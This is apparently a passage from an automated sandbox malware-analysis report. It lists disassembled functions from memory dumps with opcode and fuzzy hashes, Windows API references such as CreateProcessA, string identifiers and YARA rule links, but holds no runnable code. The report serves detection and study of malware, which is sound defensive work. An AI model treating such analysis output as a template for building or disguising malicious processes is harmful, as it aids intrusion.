Opcode Fuzzy Hash: 900b47be57b3419a0c2c27e7183cf5f399327e644b8a63f077818c63664460d9
Instruction Fuzzy Hash: 88F17030B10205DFCB14DF79D4546AEBBB6AF89710F194469E802EB394DB70DE81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0325A109 Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

$bq, xrefs: 0325A299
dbq, xrefs: 0325A23B
4bq, xrefs: 0325A25C

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: $bq$4bq$dbq
API String ID: 0-618732975
Opcode ID: dc374a909e657871c7051e2bdcf51ee65d2e430dcfc141ba4340ad2030fa246f
Instruction ID: d5bd88ce3c5070582da66666a7abb334d2c023ec4e9bec44c43e77d1052b113b
Opcode Fuzzy Hash: dc374a909e657871c7051e2bdcf51ee65d2e430dcfc141ba4340ad2030fa246f
Instruction Fuzzy Hash: 2F71E474E10208DFCB54DFA9C494A9DBBF2FF89300F208569E809AB365DB71A985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0325A118 Relevance: 3.9, Strings: 3, Instructions: 162COMMON

Download Yara Rule

Strings

$bq, xrefs: 0325A299
dbq, xrefs: 0325A23B
4bq, xrefs: 0325A25C

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: $bq$4bq$dbq
API String ID: 0-618732975
Opcode ID: 6f1377b698f1748aed338ac5f9ac9f6e744290fd8a7a412a150d3a5bd429dcad
Instruction ID: 5f3ffa399194645d59e8ab88a2160721e03b7152ce106c1c86a179f8c73b2a90
Opcode Fuzzy Hash: 6f1377b698f1748aed338ac5f9ac9f6e744290fd8a7a412a150d3a5bd429dcad
Instruction Fuzzy Hash: 9F71C574E10208CFCB54DFA9D494A9DBBB2FF88310F208569E809AB365DB71AD85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6D093EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D094042

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

__CxxThrowException@8.LIBCMT ref: 6D094059

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 2813683038-0
Opcode ID: a1efd6f50b7c06884bbd00a3439f34d332b9201d2afa833fd4ad377e430486e4
Instruction ID: 58c6919b2844789d7d3bbeff292eea66a356b5c48fcfee487eb1bea16eadbe46
Opcode Fuzzy Hash: a1efd6f50b7c06884bbd00a3439f34d332b9201d2afa833fd4ad377e430486e4
Instruction Fuzzy Hash: DD918CB1808704AFE710CF59D845B6EFBF8FF84344F15895AE5289B2A0E7B1D9048B97

Uniqueness

Uniqueness Score: -1.00%

Function 6D07BDF7 Relevance: 3.2, APIs: 2, Instructions: 200COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6D07BE2D
IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6D07BE6D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArrayDestroyReadSafe
String ID:
API String ID: 616443815-0
Opcode ID: e251d5c80309b02832307b6cfb4d2ece0cc2803ef9d5e66e2b7544c4d2b10542
Instruction ID: b5f478c2eeb6c937c03e0b2f19b81a711abf5f16e434c60f8dec969a0cd8d1a7
Opcode Fuzzy Hash: e251d5c80309b02832307b6cfb4d2ece0cc2803ef9d5e66e2b7544c4d2b10542
Instruction Fuzzy Hash: 4671F0B0D086975EFB318F79C840B79BBF1AB0A224F188398D9A59B3D2C731D442CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6D0762C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D076466

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

__CxxThrowException@8.LIBCMT ref: 6D07647D

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID:
API String ID: 2299493649-0
Opcode ID: 3e4bb589ce583f1634b816ad7920a4a2dd47525960cca2eb973c9a29bc79dc4a
Instruction ID: 497fadc10cb38e70a2b496697d7aadb284f413f1e57c4664cb83ebfec0972c2a
Opcode Fuzzy Hash: 3e4bb589ce583f1634b816ad7920a4a2dd47525960cca2eb973c9a29bc79dc4a
Instruction Fuzzy Hash: 3D519BB1908340AFE310CF54D980B5EBBE4FB84740F81492EFA898B290E370D904CB97

Uniqueness

Uniqueness Score: -1.00%

Function 6D08D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D08D3E8
__CxxThrowException@8.LIBCMT ref: 6D08D3FF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 8eeac3ab956fd8abc401902868caa17c69ae30f9fa5a93c02bcdc621349b8fcb
Instruction ID: e3ca1792eac4072edcaf86390353c0148dceac1bec93d5db2cf3e571d50965d3
Opcode Fuzzy Hash: 8eeac3ab956fd8abc401902868caa17c69ae30f9fa5a93c02bcdc621349b8fcb
Instruction Fuzzy Hash: 78314A715087059FDB04CF28D480A9EBBF4BF89714F508A2EF9558B791E731E906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D078400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D078449
__CxxThrowException@8.LIBCMT ref: 6D07845E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: c34baf152858e7f1e95dfeca8fcdc40edca52a338de5f760d0cb006d0e6cd81e
Instruction ID: 945fc5ea0737634aaa522a10a48d52fa5aed981eb792538c46fe90ff2032e070
Opcode Fuzzy Hash: c34baf152858e7f1e95dfeca8fcdc40edca52a338de5f760d0cb006d0e6cd81e
Instruction Fuzzy Hash: CC014F75904208AFDB08DF54E490DAEBBF5EF58300B51C1ADD92A4B760DB30EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 032586D8 Relevance: 2.7, Strings: 2, Instructions: 237COMMON

Download Yara Rule

Strings

d8cq, xrefs: 03258730
Hbq, xrefs: 0325894E

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Hbq$d8cq
API String ID: 0-70480990
Opcode ID: 982dd6df81d1bd9600452ecc433345748c6c3e9e8db7a55e12ad8c1eac6af626
Instruction ID: 4ea6d61d44fa161082fcd1f386517304c77fdb6bab842e74f7fca5eb68daeba3
Opcode Fuzzy Hash: 982dd6df81d1bd9600452ecc433345748c6c3e9e8db7a55e12ad8c1eac6af626
Instruction Fuzzy Hash: 9781E0343043458FC715DF39D858A6A7BE6FF85310B1884A9E846CB3A1DB74EE45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 060F2278 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

TJcq, xrefs: 060F2356
PO^q, xrefs: 060F232C

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: PO^q$TJcq
API String ID: 0-3011750398
Opcode ID: 91b19666d0cc7562225efb4fe9c7cd7483a28b68082b380ddba4b1ef30fe47ef
Instruction ID: 31ffd990238fda3ae5744042d14d5d36735eeadad73b68d981832dc756012eed
Opcode Fuzzy Hash: 91b19666d0cc7562225efb4fe9c7cd7483a28b68082b380ddba4b1ef30fe47ef
Instruction Fuzzy Hash: 64412731A54205AFC704DBA9D850AAEBFF5EF84710B0184A9F505DB351DB70EE058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0325F261 Relevance: 2.6, Strings: 2, Instructions: 110COMMON

Download Yara Rule

Strings

A, xrefs: 0325F2E0
[F, xrefs: 0325F35B

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: [F$A
API String ID: 0-1664417850
Opcode ID: b5d641b4228b3f30e86a170b1f2ee57033612ab73074e3baecec6e40c59d4580
Instruction ID: 82806606b1866c233c7a844b6113260537c6952e092678eb5109f2685cb85843
Opcode Fuzzy Hash: b5d641b4228b3f30e86a170b1f2ee57033612ab73074e3baecec6e40c59d4580
Instruction Fuzzy Hash: D041DC31210302AFC705EB78E95056ABBA2FB81344710CA6ED406CF255DB35EE8A8BD2

Uniqueness

Uniqueness Score: -1.00%

Function 0325F278 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

A, xrefs: 0325F2E0
[F, xrefs: 0325F35B

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: [F$A
API String ID: 0-1664417850
Opcode ID: 345e8dbd91664e9174e4673251e38e4924adf87e1b8b883b6d5c331da6cdfcc1
Instruction ID: df417787e710675d693f27cf74655530458ade74f8c70917464f2c601f12b546
Opcode Fuzzy Hash: 345e8dbd91664e9174e4673251e38e4924adf87e1b8b883b6d5c331da6cdfcc1
Instruction Fuzzy Hash: 36316D31250305ABC745EB69E95056EBBA2FBC1344710CA3ED4168F354DF72EE8A8BD2

Uniqueness

Uniqueness Score: -1.00%

Function 060F0002 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

Te^q, xrefs: 060F0077
TJcq, xrefs: 060F008F

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 0225511838b12fa23f0c4292c037509aefd37a7693341e78e9544a77553759c2
Instruction ID: a2c008f6a0e0f2070f759c3c8dd4f7179164d44bfbc7edb7803d8600b84c9393
Opcode Fuzzy Hash: 0225511838b12fa23f0c4292c037509aefd37a7693341e78e9544a77553759c2
Instruction Fuzzy Hash: AD31B1316093C14FC7169B78982466E7FB2AF87200F0904DED586DF2E2DA745E09C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 060F010E Relevance: 2.6, Strings: 2, Instructions: 79COMMON

Download Yara Rule

Strings

TJcq, xrefs: 060F016D
Te^q, xrefs: 060F0156

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 9eab6bbeca85d98f6f864e030bb01bb97b768dec40222586415bde317fbd5aa8
Instruction ID: c4949ad9354707c5e7d43d5de0f2da7c3de84c36bceb96bb40a65d2f29f41266
Opcode Fuzzy Hash: 9eab6bbeca85d98f6f864e030bb01bb97b768dec40222586415bde317fbd5aa8
Instruction Fuzzy Hash: 35213230B043455FCB16AB6898246BE7FB2FF86200F04049ED945DF3A1CA319E0AC3A2

Uniqueness

Uniqueness Score: -1.00%

Function 6D078D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,6D078C13,?,6D078CD3,?,6D078C13,00000000,?,?,6D078C13,?,?), ref: 6D078D73
LeaveCriticalSection.KERNEL32(?,?,?,6D078CD3,?,6D078C13,00000000,?,?,6D078C13,?,?), ref: 6D078D8C

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: a27e367795898c6aa4869218c2cbf03b8e0db085570ac1882053616c21de35d0
Instruction ID: 74dc0e5aaee01262bf10272593e38b21e45f312746dec915ca5d51207a618a57
Opcode Fuzzy Hash: a27e367795898c6aa4869218c2cbf03b8e0db085570ac1882053616c21de35d0
Instruction Fuzzy Hash: 1A21E975200109EFCB14DF49D890DAAB3BAFFC9210B118559E9058B350D771EE15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 060F0128 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

TJcq, xrefs: 060F016D
Te^q, xrefs: 060F0156

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 631aa7026c3255000fa0185fc8da4857f692703e32694f878728ab81edbaeeca
Instruction ID: a4378a7d3bed2a5f41bb7f129b02e4862704696988a162ce56929846ba534afd
Opcode Fuzzy Hash: 631aa7026c3255000fa0185fc8da4857f692703e32694f878728ab81edbaeeca
Instruction Fuzzy Hash: 5B11D531B002155BCB14EBA8D454BBFBBA2FF84710F10452DD906AB390CE719E0AC7D2

Uniqueness

Uniqueness Score: -1.00%

Function 060F0048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

Te^q, xrefs: 060F0077
TJcq, xrefs: 060F008F

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID: TJcq$Te^q
API String ID: 0-918715239
Opcode ID: 6e2ab7e72cfd2bd3ce5bde4ed0abf1d2a8ebe881eaacc3a0a72c89e4b8f0724a
Instruction ID: abf9f9ec4443bfd096d3bdef74f5df2d3d40db8078b02f650264c247c9659426
Opcode Fuzzy Hash: 6e2ab7e72cfd2bd3ce5bde4ed0abf1d2a8ebe881eaacc3a0a72c89e4b8f0724a
Instruction Fuzzy Hash: 4511B131B002155BCB18EBA8D45477FBAE6FF88600F10456DD906EB380CE719E0A87E7

Uniqueness

Uniqueness Score: -1.00%

Function 6D078BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,6D076890,?), ref: 6D078BDD
LeaveCriticalSection.KERNEL32(?), ref: 6D078C23

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 54251a9180bfc2dcd1c0539c1c4f8bf9a77ebb1fd6bfc9d985713e484d1f2c84
Instruction ID: 600f49547290a416340ed9103bf0c81dcd3c0cfe5220ef9b92a0bcf743f294f3
Opcode Fuzzy Hash: 54251a9180bfc2dcd1c0539c1c4f8bf9a77ebb1fd6bfc9d985713e484d1f2c84
Instruction Fuzzy Hash: 4901BCB1704104AFD750DFA8C880A9AF7E8FB8D200710426AEA09C7301DB32EE50CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0325C418 Relevance: 1.9, Strings: 1, Instructions: 614COMMON

Download Yara Rule

Strings

Teq, xrefs: 0325C4A3

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-994465419
Opcode ID: 269ee9bd3b6ce65669275656362e7ab8e3746e290b38b765054989daa42baf68
Instruction ID: 2a4456fd8962f95ae07259cbebc8cfd72b6fc96414152d444e140da282329508
Opcode Fuzzy Hash: 269ee9bd3b6ce65669275656362e7ab8e3746e290b38b765054989daa42baf68
Instruction Fuzzy Hash: 6042C03A500204EFDB0A8F94D944E95BFB3FF48314B1A84A8E6059F276C736D9A1EF51

Uniqueness

Uniqueness Score: -1.00%

Function 061149A4 Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06114C77

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 04ff09c32044e0f8a109dd492ab18b856a6740670db2ca83d4424c3140d9f451
Instruction ID: 74597aed6f780eca23d37e34dcf4d1837ea560e71e7cafd9995d29e4e4c7e26a
Opcode Fuzzy Hash: 04ff09c32044e0f8a109dd492ab18b856a6740670db2ca83d4424c3140d9f451
Instruction Fuzzy Hash: BCC10471D002298FDF64CFA8C841BEDBBF1BB49304F0495A9E849BB250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 061149B0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06114C77

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: aa26b8840384fa28362f1fc2df5d5fd69fb7658ff610eafbf6d2311cab6100eb
Instruction ID: 8092dfb17221284f29c117a2277b64e4f0bd2a62191f8daf8579ff1e26107195
Opcode Fuzzy Hash: aa26b8840384fa28362f1fc2df5d5fd69fb7658ff610eafbf6d2311cab6100eb
Instruction Fuzzy Hash: 74C10471D002298FDF64CFA8C841BEDBBF1BB49304F0495A9E449BB250EB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0325C416 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

Teq, xrefs: 0325C4A3

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-994465419
Opcode ID: 74e1919562888c2dbbc6a97fe6f7a2f95411a1061b5fafef7698b873485395d3
Instruction ID: 03fcd38035eabc1cb4cf328690f48e10256f11de0bffd4055cb86fc9715c0155
Opcode Fuzzy Hash: 74e1919562888c2dbbc6a97fe6f7a2f95411a1061b5fafef7698b873485395d3
Instruction Fuzzy Hash: 4C228A3A500200AFDB0A9F94D914E95BFB3FF58318B1A84A8E2055F276C737D9A1EF51

Uniqueness

Uniqueness Score: -1.00%

Function 6D08E2CE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
